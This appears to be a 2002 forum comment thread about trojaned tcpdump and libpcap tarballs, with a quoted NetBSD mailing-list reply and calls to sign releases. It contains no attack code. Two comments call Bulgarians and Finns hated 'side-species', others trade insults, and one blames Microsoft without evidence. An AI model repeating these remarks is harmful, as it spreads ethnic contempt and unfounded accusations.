...well? Please to release the info and name the bank and name the program. You are FOR crooks or AGAINST crooks, and releasing the info of this backdoor is a good thing to do. If it's really there, it most likely is *illegal* so any sort of nondisclosure noise is null and void, AFAIK. You DON'T have to cover up illegalities, in fact you are supposed to report them. This bank and it's bogus officers and "bosses" needs to see the light of day in a fed courtroom.
Is there any tool to analyze source code as an antivirus scans a binary file?
For example, in this case, the program is running an external app and making changes to a system file.
This is the first kind of thing I would see if I audit the code quickly.
we should divorce tcpdump.org and take half their money. at least that was my punishment when my wife found a Trojan in my car.
TRUSTED COMPUTING!
By locking up the code so no one will ever ever be able to see what it really is, then we can INSURE that people get safe code that runs like a happy little gerbil! Yes!
It's not that simple. Sure, if all you're looking to do is execute some code and THEN give the user their expected interface, then that will work half-acceptably. However, you could not use this as a way to, say, discretely intercept logins and passwords, transfer account balances, read someone's database, or what have you since all of that requires you to intercept things and still provide the user with acceptable responses (at least if you wish to avoid detection for more than a couple runs). Now you might attempt to come up with some elaborate scheme to act as an interactive go-between between the actual application and the your trojan, but then you've greatly increased the complexity and the odds of detection.
No. There is a huge difference.
This is great, you've learned how to spin an argument.
Not only have you used the cliche "Well they aren't any better either...", you've even taken one step further and declared this weakness as your greatest strength.
Although to be an expert spin-meister you should have blamed this on Microsoft some how. Work on it, get back to us. Maybe we can get you a job at the Whitehouse if the tech market continues to flounder.
..and the new 5.0 is SOOO secure
Wow,... the story made it almost an hour before someone blamed Microsoft!
"It takes considerable knowledge just to realize the extent of your own ignorance." - Thomas Sowell
Did anyone pay you for the trojan in Borlands Interbase? How sure are there's no trojan in Microsoft software? Would you know if there was? I'm aware you're just trolling, but keep in mind, the Interbase hole wasn't discovered for 6 YEARS when Borland open sourced it. Btw, no one ever said there was no security holes in open source software.
Maybe I'm retarded, but the articles do not mention when they think the trojan was introduced. Does anyone know?
Download gpg from gnupg.org. Build it.
According to the GnuPG web site, building GnuPG on Windows 2000 requires a "special setup," which I take to mean Cygwin. I currently use MinGW because I have had trouble getting Cygwin to work. What OpenPGP compatible software package do you recommend for users of Windows operating systems?
Will I retire or break 10K?
Yeah.... that's why wiretapped.us redirects to wiretapped.net...
are either:
1) an ignorant fuckwit
or
2) a lying fuckwit
well, which one is it?
Microsoft, or some other groupp that has an ax to grind against Free and OSS, is behind these trojans.
The goal? To do this exact thing to the Linux kernel or perhaps the samba project. They badly want to discredit Linux, and they will attempt to do so by any and all means. Call me paranoid, but what I say is true.
We must counter this life-threatening attack quickly or it will be a huge set-back or perhaps the begining of the end of free and OSS software.
That damn RPM format changes every other day.
My download from 9/28 2002 is okay.
tcpdump from 8/29 is good too.
Check this post to the netbsd-users mailing list (emphasis mine) :
From: David Maxwell
To: Stefan Schumacher
Cc: netbsd-users@netbsd.org
Subject: Re: Trojans in libpcap and tcpdump
Date: Wed, 13 Nov 2002 14:39:05 -0500
Sender: netbsd-users-owner@netbsd.org
User-Agent: Mutt/1.4i
On Wed, Nov 13, 2002 at 06:52:38PM +0100, Stefan Schumacher wrote:
> Hi there,
>
> report was given that trojans were detected in libpcap and tcpdump.
>
> http://hlug.fscker.com/
>
> I fetched tcpdump and libpcap and took a look in the sources, seems so as
> if we IMHO are not affected.
That is correct.
I've been at the console of the tcpdump.org server today, working with
Michael Richardson to investigate the problem. He will release a
statement on the details at some point. The system was not running an
up to date version of NetBSD, so there is no indication that users with
up to date systems are vulnerable to some new bug.
The trojan was installed within the last two days. The signatures in
pkgsrc are eight _months_ old. Users installing from pkgsrc (source, or
binary packages) could not be affected by this trojan without
specifically overriding the incorrect signature on the distribution
file.
Michael's contact information is listed in the whois entry for the
tcpdump.org domain, but as far as I know, he did not receive a call
about this issue, it was slashdotted.
--
Now if every open source developer had something along the following outline in their crontab...
ftp sources from ftp distribution server diff against known good copy mail if different
Maybe not practical for the biggest projects, but for the rest?
Idea 2 - responsible mirroring
Mirrors shouldn't accept changed sources without an accompanying bump in the version/release number in the filename - this would make it much easier to spot trojaned versions
Okay that relies on developers being careful to bump the release no. after every change (doc updates etc.)
"Linux is a serious competitor"
- Steve Ballmer, Chief Executive Microsoft Corp.
We contacted Joseph Shaw, who did the web design for the site and he tried many times to contact, The trojan was found about 11:15pm by 12:45 Joe was trying to contact Michael Richardson. Due to the nature that this was not an exploit but a trojan it seemed the best to report it rather than keep it hidden.
Bulgarian are not Russians, they are Bulgarians, a very hated side-species on humandkind.
Because Finns are as bad as Bulgarian, and are second most hated side-species of humankind.
I've been looking for something like this for a while: interactive security policy management of sandboxed applications. Upon cursory inspection, it looks like it only works with userspace syscalls, but I imagine that should do the trick 99% of the time (unless a nefarious kernel module is installed or the app can somehow access hardware directly?).
I'm hoping someone will make a console frontend... or maybe I will once I learn enough.
I've actually been worried about switching to linux for a while due to security reasons (namely that it seems to require an insane amount of diligence to maintain a secure system which changes dynamically -- i.e. trying out new apps all the time)... and oftentimes, apps need to be installed as root, which has no restrictions upon the powers given to the new program.
LIDS, LOMAC, etc. seem to require much prior consideration of policies (which, ideally, should be dictated by the creators of the program and/or by the major distrobutions, only to be inspected by the user or limited by the user's own global policies). btw: is there any program to convert between the policies established for the different security systems?
I am constantly trying out new software and if I can't sandbox it even a bit (like zonealarm interactively protecting net connections or secure4u for windows) then its not worth it.
Thanks again.
Because there only needs to be *one* person out there who *does* look at the diffs and catches the thing. *Not* every person needs to catch the thing.
Furthermore, analysis of what the thing is doing is much easier with open source.
May we never see th
Apparently, it was less than one day.
As someone else pointed out, the closed-source Interbase (DBMS) contained a trojan for over six years which was only found after it was open-sourced.
May we never see th
Never mind the viruses, we've lost at least a few man-days of work to Windows XP service pack 1 - it left a few of the computers round our office dead in the water.
I don't even want to BEGIN to go into how much time I've wasted over the years working around problems in Microsoft APIs, bugs and limitations in their software and APIs, figuring out the hard way that their API documentation is often outright wrong, waiting for reboots from Windows crashing/freezing, restarting MS programs when they crash, re-doing lost work when a MS program crashes .. the fun never ends. Just yesterday I discovered that listboxes in Win9X cannot handle more than 32K entries. The solution? Basically, "write your own listbox control". This alone is likely to blow at least another day of mine, as I HAVE to work around this one. (To be fair, gtk is even more idiotic, with a listbox limit of 2K entries, not sure if thats been fixed yet).
All the replying posts pointing out that it's a phone company/ISP and it's almost certainly nothing to do with this chap are at 2 or below, meaning that many people won't see them and this individual's name is now besmirched.
The sad part of this is the fact that we (people who have moderator points to give away) can't really fix the problem even after we're told about it. I could go back and mod down the misleading post, but then some metamoderator would see that I modded down what appears at face value to be an "interesting" post and I would be the one who was bitch-slapped for abusing my moderator points. All we can really do is mod up the replies, making the whole thread +5 in order to dilute the bad moderation.
...don't understand the ins and outs of Trojans (another joke). But why would you want to spend time writing flames for people who don't share your own brand of uber-geekery? Presumably those of us who spend time here do so in pursuit of some nerdy interest of our own.
Making trouble today for a better tomorrow...
According to OpenBSD Joural, OpenBSD is not affected. NOT AT ALL!!!
- Pcap and Tcpdump are brought in only periodically and after a thorough code review.
- OpenBSD rolls its own build system (for pcap and tcpdump).
The trojan affected the configure script and was activated at build time.
I Love OpenBSD!!!
Go to gnupg.org and install gpg. Generate a keypair and put your public key up on wwwkeys.pgp.net. Whenever you meet another developer, sign each others keys. When you release a tarball, FUCKING SIGN IT and put up instructions telling people how to verify it. This sort of thing does not have to happen. The tools are there to prevent anyone ever trojaning an FTP server again. You will have to do this eventually or no one will trust your server enough to download your software, so why not start now? GO AND FUCKING START.
</rant>
Sorry about that, but how many times does this have to happen? It's trivial to prevent, but most people don't even try. Go and damn well start!
...has just been knocked-down in reliability by SOMEONE FROM WITHIN THEIR OWN GROUP?!?!
I'm sorry, but I'm sitting here and having a (small) chuckle at the people who constantly attacked Microsoft for not being "secure" - people who now have (probably) been compromized (again) by someone (hopefully not) within the Open Source community, or at least someone who gained sufficient access to the source code to insert their code. From what I've read so far, this seems to have been a fairly trivial thing for the "infiltrator" to accomplish.
First, there were the trojanized versions of OpenSSH, BitchX, dsniff and a few other tools. Now, we have trojanized versions of some fairly non-trivial tools. What's next? Who knows? No one does.
The really funny thing is that because of it's own charter and design, the Open Source community has created their own FUD about their own products. Let's all hope that they take the initiative to prevent such things from happening again. Remember: "Fool me once, shame on you...fool me twice, shame on me...fool me five times and someone please kick me in the head!"
The really excellent thing about this happening is that the Open Source community got together, spread the info about the trojan/exploit rapidly and did an excellent job of damage control. The people that found the trojan (http://www.hlug.org) should be commended for their dedication to checking source code - something that should have happend (IMHO) quite a way up the development chain. Unfortunately, it appears that due to the very nature of Open Source development (i.e. the ability of pretty much ANYONE to contribute source-code to the development tree and even have it included in the latest CVS) that this will not be the last "event" concerning compromised source-code - unless the Open Source development community seriously re-work their development cycle and include exhaustive souce-code review before ANY source-code is released for "public" consumption.
ScottKin
I don't give a rat's behind about "karma" here or anywhere else. Don't like what I have to say here? Deal with it!
Why Gentoo is safe? How about Redhat and Mandrake? Are those safe? If not how do I can fix it? Please email me at gigsvoo@yahoo.com, thanks alot!
Thanks
Neo Gigs
"Follow the white rabbit..."
The Analytical Engine weaves Algebraical patterns just as the Jacquard
loom weaves flowers and leaves.
-- Ada Augusta, Countess of Lovelace, the first programmer
- this post brought to you by the Automated Last Post Generator...